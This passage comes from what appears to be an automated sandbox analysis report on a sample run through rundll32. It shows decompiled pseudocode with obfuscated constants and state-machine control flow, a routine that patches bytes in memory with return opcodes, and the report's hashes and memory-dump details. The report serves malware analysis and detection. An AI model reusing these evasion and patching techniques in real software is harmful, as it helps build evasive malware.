                                                                                                                          							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                          							L13:
                                                                                                                          							_t162 = _t167 + 0xe63f1a5;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t162 == 0x5bc9ad4) {
                                                                                                                          							_t156 = E00798E4D( &_v556,  &_v600);
                                                                                                                          							asm("sbb ecx, ecx");
                                                                                                                          							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						if(_t162 == 0xac58df2) {
                                                                                                                          							_v576 = _t187;
                                                                                                                          							_t162 = 0xcf1a497;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t162 != 0xcf1a497) {
                                                                                                                          							if(_t162 == 0xe63f1a5) {
                                                                                                                          								return E007A1E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                          							}
                                                                                                                          							goto L18;
                                                                                                                          						}
                                                                                                                          						_push(_t162);
                                                                                                                          						_t156 = E00795988(_t162, _v608);
                                                                                                                          						_t193 = _t156;
                                                                                                                          						if(_t156 != 0xffffffff) {
                                                                                                                          							_t162 = 0x48c9d54;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						L8:
                                                                                                                          						return _t156;
                                                                                                                          					}
                                                                                                                          					_t151 = E00792A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                          					_t196 =  &(_t196[3]);
                                                                                                                          					if(_t151 == 0) {
                                                                                                                          						_t162 = 0xe63f1a5;
                                                                                                                          						goto L18;
                                                                                                                          					} else {
                                                                                                                          						_t162 = 0x5bc9ad4;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L8;
                                                                                                                          					L18:
                                                                                                                          				} while (_t162 != 0xad68edc);
                                                                                                                          				return _t156;
                                                                                                                          			}

































                                                                                                                          0x0079e4bb
                                                                                                                          0x0079e4bb
                                                                                                                          0x0079e4c9
                                                                                                                          0x0079e56a
                                                                                                                          0x0079e57d
                                                                                                                          0x0079e582
                                                                                                                          0x0079e589
                                                                                                                          0x0079e58b
                                                                                                                          0x0079e55b
                                                                                                                          0x0079e55b
                                                                                                                          0x00000000
                                                                                                                          0x0079e55b
                                                                                                                          0x0079e4d5
                                                                                                                          0x0079e54a
                                                                                                                          0x0079e553
                                                                                                                          0x0079e555
                                                                                                                          0x00000000
                                                                                                                          0x0079e555
                                                                                                                          0x0079e4dd
                                                                                                                          0x0079e532
                                                                                                                          0x0079e536
                                                                                                                          0x00000000
                                                                                                                          0x0079e536
                                                                                                                          0x0079e4e5
                                                                                                                          0x0079e4e9
                                                                                                                          0x00000000
                                                                                                                          0x0079e505
                                                                                                                          0x00000000
                                                                                                                          0x0079e4e9
                                                                                                                          0x0079e51b
                                                                                                                          0x0079e520
                                                                                                                          0x0079e525
                                                                                                                          0x0079e52c
                                                                                                                          0x0079e52e
                                                                                                                          0x00000000
                                                                                                                          0x0079e52e
                                                                                                                          0x0079e512
                                                                                                                          0x0079e512
                                                                                                                          0x0079e512
                                                                                                                          0x0079e5a6
                                                                                                                          0x0079e5ab
                                                                                                                          0x0079e5b0
                                                                                                                          0x0079e5bc
                                                                                                                          0x00000000
                                                                                                                          0x0079e5b2
                                                                                                                          0x0079e5b2
                                                                                                                          0x00000000
                                                                                                                          0x0079e5b2
                                                                                                                          0x00000000
                                                                                                                          0x0079e5be
                                                                                                                          0x0079e5be
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                          • API String ID: 0-3572798563
                                                                                                                          • Opcode ID: 3f4c13052e594095ceec908b648c77d657c97bd5e6a29d2af03061c4db69e6c8
                                                                                                                          • Instruction ID: 58ac87025a874ea0d7832a565d5c042559d4212e1810a48ab5088123ed7862c2
                                                                                                                          • Opcode Fuzzy Hash: 3f4c13052e594095ceec908b648c77d657c97bd5e6a29d2af03061c4db69e6c8
                                                                                                                          • Instruction Fuzzy Hash: A4718672508301DFC758CF22D88985FBBE1EBC4768F544A2DF586962A0D7798A09CF82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                            • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                          • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                            • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                          • String ID: LOC
                                                                                                                          • API String ID: 3864805678-519433814
                                                                                                                          • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                          • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                          • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                          • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E0079CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                          				char _v32;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				intOrPtr _v88;
                                                                                                                          				char* _v92;
                                                                                                                          				char _v112;
                                                                                                                          				char _v120;
                                                                                                                          				intOrPtr _v124;
                                                                                                                          				char _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				signed int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v196;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v204;
                                                                                                                          				signed int _v208;
                                                                                                                          				signed int _v212;
                                                                                                                          				signed int _v216;
                                                                                                                          				signed int _v220;
                                                                                                                          				signed int _v224;
                                                                                                                          				signed int _v228;
                                                                                                                          				signed int _v232;
                                                                                                                          				signed int _v236;
                                                                                                                          				signed int _v240;
                                                                                                                          				signed int _v244;
                                                                                                                          				signed int _v248;
                                                                                                                          				signed int _v252;
                                                                                                                          				signed int _v256;
                                                                                                                          				signed int _v260;
                                                                                                                          				signed int _v264;
                                                                                                                          				signed int _v268;
                                                                                                                          				void* _t345;
                                                                                                                          				void* _t377;
                                                                                                                          				void* _t378;
                                                                                                                          				void* _t386;
                                                                                                                          				void* _t393;
                                                                                                                          				intOrPtr _t403;
                                                                                                                          				intOrPtr* _t406;
                                                                                                                          				void* _t408;
                                                                                                                          				signed char* _t414;
                                                                                                                          				signed char* _t450;
                                                                                                                          				intOrPtr* _t455;
                                                                                                                          				intOrPtr _t456;
                                                                                                                          				intOrPtr _t457;
                                                                                                                          				void* _t458;
                                                                                                                          				signed char* _t459;
                                                                                                                          				signed int _t460;
                                                                                                                          				signed int _t461;
                                                                                                                          				signed int _t462;
                                                                                                                          				signed int _t463;
                                                                                                                          				signed int _t464;
                                                                                                                          				signed int _t465;
                                                                                                                          				signed int _t466;
                                                                                                                          				signed int _t467;
                                                                                                                          				signed int _t468;
                                                                                                                          				signed int _t469;
                                                                                                                          				void* _t470;
                                                                                                                          				void* _t471;
                                                                                                                          				void* _t474;
                                                                                                                          
                                                                                                                          				_t406 = _a8;
                                                                                                                          				_t456 = _a4;
                                                                                                                          				_push(_a20);
                                                                                                                          				_t455 = _a16;
                                                                                                                          				_push(_t455);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_t406);
                                                                                                                          				_push(_t456);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t345);
                                                                                                                          				_v256 = 0xcf1dac;
                                                                                                                          				_t471 = _t470 + 0x1c;
                                                                                                                          				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                          				_v256 = _v256 << 2;
                                                                                                                          				_t408 = 0x8e80a37;
                                                                                                                          				_v256 = _v256 + 0xffff9089;
                                                                                                                          				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                          				_v160 = 0x25617a;
                                                                                                                          				_v160 = _v160 << 2;
                                                                                                                          				_v160 = _v160 ^ 0x009585a8;
                                                                                                                          				_v264 = 0x39e017;
                                                                                                                          				_v264 = _v264 + 0xffffbc9c;
                                                                                                                          				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                          				_v264 = _v264 + 0xffffd7b2;
                                                                                                                          				_v264 = _v264 ^ 0xb125b990;
                                                                                                                          				_v240 = 0xb82586;
                                                                                                                          				_t460 = 0x74;
                                                                                                                          				_v240 = _v240 / _t460;
                                                                                                                          				_v240 = _v240 << 1;
                                                                                                                          				_t461 = 0x3b;
                                                                                                                          				_v132 = _v132 & 0x00000000;
                                                                                                                          				_v240 = _v240 * 0x36;
                                                                                                                          				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                          				_v180 = 0xcab8fe;
                                                                                                                          				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                          				_v180 = _v180 | 0x3e03c42f;
                                                                                                                          				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                          				_v248 = 0x57862;
                                                                                                                          				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                          				_v248 = _v248 / _t461;
                                                                                                                          				_t462 = 0x62;
                                                                                                                          				_v248 = _v248 / _t462;
                                                                                                                          				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                          				_v252 = 0x68f561;
                                                                                                                          				_v252 = _v252 << 6;
                                                                                                                          				_v252 = _v252 >> 0xd;
                                                                                                                          				_v252 = _v252 | 0x3cddc102;
                                                                                                                          				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                          				_v192 = 0x7c8e99;
                                                                                                                          				_v192 = _v192 + 0x829c;
                                                                                                                          				_v192 = _v192 * 0x31;
                                                                                                                          				_v192 = _v192 ^ 0x17fda794;
                                                                                                                          				_v228 = 0x74d91a;
                                                                                                                          				_v228 = _v228 << 3;
                                                                                                                          				_v228 = _v228 + 0x7502;
                                                                                                                          				_v228 = _v228 * 0x63;
                                                                                                                          				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                          				_v208 = 0xc909ae;
                                                                                                                          				_v208 = _v208 << 1;
                                                                                                                          				_t463 = 0xb;
                                                                                                                          				_v208 = _v208 / _t463;
                                                                                                                          				_v208 = _v208 ^ 0x00276772;
                                                                                                                          				_v164 = 0x673800;
                                                                                                                          				_v164 = _v164 << 9;
                                                                                                                          				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                          				_v232 = 0xb859bd;
                                                                                                                          				_v232 = _v232 + 0xde76;
                                                                                                                          				_t464 = 0x5b;
                                                                                                                          				_v232 = _v232 * 0x1c;
                                                                                                                          				_v232 = _v232 * 0x30;
                                                                                                                          				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                          				_v172 = 0x7eda56;
                                                                                                                          				_v172 = _v172 << 3;
                                                                                                                          				_v172 = _v172 ^ 0x03f50911;
                                                                                                                          				_v184 = 0x2f7891;
                                                                                                                          				_v184 = _v184 / _t464;
                                                                                                                          				_t465 = 0x41;
                                                                                                                          				_v184 = _v184 * 0x49;
                                                                                                                          				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                          				_v148 = 0x4a0bea;
                                                                                                                          				_v148 = _v148 ^ 0x502016f1;
                                                                                                                          				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                          				_v260 = 0x9ebd58;
                                                                                                                          				_v260 = _v260 >> 8;
                                                                                                                          				_v260 = _v260 << 0xf;
                                                                                                                          				_v260 = _v260 + 0xb306;
                                                                                                                          				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                          				_v204 = 0xce3506;
                                                                                                                          				_v204 = _v204 << 0xf;
                                                                                                                          				_v204 = _v204 << 0xc;
                                                                                                                          				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                          				_v244 = 0xe7c592;
                                                                                                                          				_v244 = _v244 >> 5;
                                                                                                                          				_v244 = _v244 ^ 0x506a7775;
                                                                                                                          				_v244 = _v244 << 1;
                                                                                                                          				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                          				_v268 = 0x1d8a79;
                                                                                                                          				_v268 = _v268 << 2;
                                                                                                                          				_v268 = _v268 / _t465;
                                                                                                                          				_v268 = _v268 | 0x253986a4;
                                                                                                                          				_v268 = _v268 ^ 0x2531568a;
                                                                                                                          				_v216 = 0x116531;
                                                                                                                          				_t466 = 0x61;
                                                                                                                          				_v216 = _v216 * 0x66;
                                                                                                                          				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                          				_v216 = _v216 ^ 0xf917010b;
                                                                                                                          				_v200 = 0xc05f9c;
                                                                                                                          				_v200 = _v200 / _t466;
                                                                                                                          				_v200 = _v200 * 0x6f;
                                                                                                                          				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                          				_v212 = 0xdb89ea;
                                                                                                                          				_v212 = _v212 >> 0xa;
                                                                                                                          				_v212 = _v212 >> 9;
                                                                                                                          				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                          				_v152 = 0x38fb70;
                                                                                                                          				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                          				_v152 = _v152 ^ 0x313af23a;
                                                                                                                          				_v136 = 0x7e2008;
                                                                                                                          				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                          				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                          				_v196 = 0x9c4278;
                                                                                                                          				_t467 = 0x4e;
                                                                                                                          				_v196 = _v196 * 0x7e;
                                                                                                                          				_v196 = _v196 ^ 0xa26962db;
                                                                                                                          				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                          				_v220 = 0x1e88f4;
                                                                                                                          				_v220 = _v220 >> 4;
                                                                                                                          				_v220 = _v220 >> 7;
                                                                                                                          				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                          				_v140 = 0xc2e6ba;
                                                                                                                          				_v140 = _v140 + 0x8875;
                                                                                                                          				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                          				_v188 = 0xdb74c;
                                                                                                                          				_v188 = _v188 << 4;
                                                                                                                          				_v188 = _v188 * 0x5c;
                                                                                                                          				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                          				_v236 = 0x62ea5;
                                                                                                                          				_v236 = _v236 / _t467;
                                                                                                                          				_v236 = _v236 >> 0xb;
                                                                                                                          				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                          				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                          				_v144 = 0x2b6271;
                                                                                                                          				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                          				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                          				_v224 = 0x8bb898;
                                                                                                                          				_v224 = _v224 + 0x43a9;
                                                                                                                          				_v224 = _v224 << 0x10;
                                                                                                                          				_t468 = 0x71;
                                                                                                                          				_t469 = _v132;
                                                                                                                          				_v224 = _v224 / _t468;
                                                                                                                          				_v224 = _v224 ^ 0x023712cd;
                                                                                                                          				_v156 = 0xb23c07;
                                                                                                                          				_v156 = _v156 + 0x4ded;
                                                                                                                          				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                          				_v168 = 0xb501ce;
                                                                                                                          				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                          				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                          				_v176 = 0xab8984;
                                                                                                                          				_v176 = _v176 * 0x22;
                                                                                                                          				_v176 = _v176 ^ 0x16c84308;
                                                                                                                          				goto L1;
                                                                                                                          				do {
                                                                                                                          					while(1) {
                                                                                                                          						L1:
                                                                                                                          						_t474 = _t408 - 0xd9acfaa;
                                                                                                                          						if(_t474 > 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t474 == 0) {
                                                                                                                          							E007A8519(_v236, _v144, _v128);
                                                                                                                          							_t408 = 0xfbb751f;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t408 == 0x15a913b) {
                                                                                                                          							_v40 = _t456;
                                                                                                                          							_v92 =  &_v32;
                                                                                                                          							_v56 =  *_t455;
                                                                                                                          							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                          							_v88 = 0x20;
                                                                                                                          							_t393 = E00797735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                          							_t471 = _t471 + 0x10;
                                                                                                                          							if(_t393 == 0) {
                                                                                                                          								L20:
                                                                                                                          								return _v132;
                                                                                                                          							}
                                                                                                                          							_t408 = 0xf0a856e;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t408 == 0x3749e66) {
                                                                                                                          							_t469 = E007A0AE0(_v176, _v168);
                                                                                                                          							_t408 = 0x46acfc9;
                                                                                                                          							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t408 == 0x46acfc9) {
                                                                                                                          							_push(_t408);
                                                                                                                          							_push(_t408);
                                                                                                                          							_t403 = E00797FF2( *((intOrPtr*)(_t406 + 4)));
                                                                                                                          							 *_t406 = _t403;
                                                                                                                          							if(_t403 == 0) {
                                                                                                                          								_t408 = 0xd9acfaa;
                                                                                                                          							} else {
                                                                                                                          								_v132 = 1;
                                                                                                                          								_t408 = 0xfb3baa2;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t408 != 0x8e80a37) {
                                                                                                                          							goto L31;
                                                                                                                          						}
                                                                                                                          						_t408 = 0xfac38db;
                                                                                                                          					}
                                                                                                                          					if(_t408 == 0xf0a856e) {
                                                                                                                          						_t377 = E007970B3(_v164,  &_v128,  &_v120, _v232, _v172);
                                                                                                                          						_t471 = _t471 + 0xc;
                                                                                                                          						if(_t377 == 0) {
                                                                                                                          							_t408 = 0xfbb751f;
                                                                                                                          							goto L31;
                                                                                                                          						}
                                                                                                                          						_t408 = 0x3749e66;
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					if(_t408 == 0xfac38db) {
                                                                                                                          						_push( *_t455);
                                                                                                                          						_t378 = E007AAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
                                                                                                                          						_t471 = _t471 + 0x14;
                                                                                                                          						if(_t378 == 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						_t408 = 0x15a913b;
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					if(_t408 == 0xfb3baa2) {
                                                                                                                          						_t457 =  *_t406;
                                                                                                                          						E00797E87(_v268, _v216, _v200, _t457);
                                                                                                                          						_t458 = _t457 + _v264;
                                                                                                                          						E0079ED7E(_v212, _t458, _v152, _v128, _v124);
                                                                                                                          						_t459 = _t458 + _v124;
                                                                                                                          						E0079A492(_v196, _v220, _t459, _t469);
                                                                                                                          						_t450 =  &(_t459[_t469]);
                                                                                                                          						_t471 = _t471 + 0x20;
                                                                                                                          						_t414 = _t459;
                                                                                                                          						if(_t459 >= _t450) {
                                                                                                                          							L25:
                                                                                                                          							_t386 = E007A0AE0(0xe, 0);
                                                                                                                          							_t408 = 0xd9acfaa;
                                                                                                                          							 *((char*)(_t386 + _t459)) = 0;
                                                                                                                          							_t456 = _a4;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							goto L22;
                                                                                                                          						}
                                                                                                                          						do {
                                                                                                                          							L22:
                                                                                                                          							if(( *_t414 & 0x000000ff) == _v256) {
                                                                                                                          								 *_t414 = 0xc3;
                                                                                                                          							}
                                                                                                                          							_t414 =  &(_t414[1]);
                                                                                                                          						} while (_t414 < _t450);
                                                                                                                          						goto L25;
                                                                                                                          					}
                                                                                                                          					if(_t408 != 0xfbb751f) {
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					E007A8519(_v224, _v156, _v120);
                                                                                                                          					goto L20;
                                                                                                                          					L31:
                                                                                                                          				} while (_t408 != 0x5927677);
                                                                                                                          				goto L20;
                                                                                                                          			}

                                                                                                                          0x0079d67e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d684
                                                                                                                          0x00000000
                                                                                                                          0x0079d684
                                                                                                                          0x0079d581
                                                                                                                          0x0079d5b9
                                                                                                                          0x0079d5c8
                                                                                                                          0x0079d5d1
                                                                                                                          0x0079d5ee
                                                                                                                          0x0079d5f3
                                                                                                                          0x0079d60e
                                                                                                                          0x0079d613
                                                                                                                          0x0079d616
                                                                                                                          0x0079d619
                                                                                                                          0x0079d61d
                                                                                                                          0x0079d630
                                                                                                                          0x0079d63f
                                                                                                                          0x0079d646
                                                                                                                          0x0079d64b
                                                                                                                          0x0079d64f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d626
                                                                                                                          0x0079d628
                                                                                                                          0x0079d628
                                                                                                                          0x0079d62b
                                                                                                                          0x0079d62c
                                                                                                                          0x00000000
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d589
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d5a1
                                                                                                                          0x00000000
                                                                                                                          0x0079d6c7
                                                                                                                          0x0079d6c7
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                          • API String ID: 0-3591755710
                                                                                                                          • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                          • Instruction ID: aa17eeec5a758c97ba291d6d7a3847771dd47751d55c936814da4f48ae2f0274
                                                                                                                          • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                          • Instruction Fuzzy Hash: CA121F715083809FD768CF25D48AA5BFBE1FBC4348F20891DF69A8A261DBB59944CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A907F(intOrPtr* __ecx) {
                                                                                                                          				intOrPtr* _v4;
                                                                                                                          				char _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				unsigned int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				void* _t284;
                                                                                                                          				void* _t285;
                                                                                                                          				intOrPtr _t286;
                                                                                                                          				void* _t293;
                                                                                                                          				void* _t301;
                                                                                                                          				signed int _t304;
                                                                                                                          				signed int _t305;
                                                                                                                          				signed int _t306;
                                                                                                                          				signed int _t307;
                                                                                                                          				signed int _t308;
                                                                                                                          				void* _t311;
                                                                                                                          				intOrPtr* _t343;
                                                                                                                          				void* _t347;
                                                                                                                          				signed int* _t348;
                                                                                                                          
                                                                                                                          				_t348 =  &_v132;
                                                                                                                          				_t343 = __ecx;
                                                                                                                          				_v4 = __ecx;
                                                                                                                          				_v40 = 0x7c806d;
                                                                                                                          				_v40 = _v40 + 0x9e80;
                                                                                                                          				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                          				_v12 = 0xea5ac0;
                                                                                                                          				_v12 = _v12 + 0xffff451e;
                                                                                                                          				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                          				_v24 = 0xace3a9;
                                                                                                                          				_t347 = 0;
                                                                                                                          				_t304 = 0xa;
                                                                                                                          				_v24 = _v24 / _t304;
                                                                                                                          				_v24 = _v24 ^ 0x001149f7;
                                                                                                                          				_t301 = 0x97dfe60;
                                                                                                                          				_v112 = 0x63471f;
                                                                                                                          				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                          				_v112 = _v112 | 0x0d4cecae;
                                                                                                                          				_v112 = _v112 << 3;
                                                                                                                          				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                          				_v28 = 0x68a2fc;
                                                                                                                          				_t305 = 0x5b;
                                                                                                                          				_v28 = _v28 * 0x1c;
                                                                                                                          				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                          				_v84 = 0x508d02;
                                                                                                                          				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                          				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                          				_v124 = 0xc0d8a4;
                                                                                                                          				_v124 = _v124 + 0xffffd7c7;
                                                                                                                          				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                          				_v124 = _v124 + 0xffffcd63;
                                                                                                                          				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                          				_v116 = 0xc7a01f;
                                                                                                                          				_v116 = _v116 * 0x50;
                                                                                                                          				_v116 = _v116 << 7;
                                                                                                                          				_v116 = _v116 + 0x525d;
                                                                                                                          				_v116 = _v116 ^ 0x3100192e;
                                                                                                                          				_v88 = 0x173e76;
                                                                                                                          				_v88 = _v88 / _t305;
                                                                                                                          				_v88 = _v88 + 0xcdb8;
                                                                                                                          				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                          				_v48 = 0x3a45de;
                                                                                                                          				_t306 = 0x3d;
                                                                                                                          				_v48 = _v48 / _t306;
                                                                                                                          				_v48 = _v48 ^ 0x0006d702;
                                                                                                                          				_v52 = 0xd8d0f7;
                                                                                                                          				_v52 = _v52 | 0xabcf1793;
                                                                                                                          				_v52 = _v52 + 0xffff6a1e;
                                                                                                                          				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                          				_v64 = 0xff5420;
                                                                                                                          				_v64 = _v64 >> 9;
                                                                                                                          				_v64 = _v64 + 0xffff2626;
                                                                                                                          				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                          				_v80 = 0x65116e;
                                                                                                                          				_v80 = _v80 >> 9;
                                                                                                                          				_v80 = _v80 | 0xde6750c8;
                                                                                                                          				_v80 = _v80 ^ 0xde6208e1;
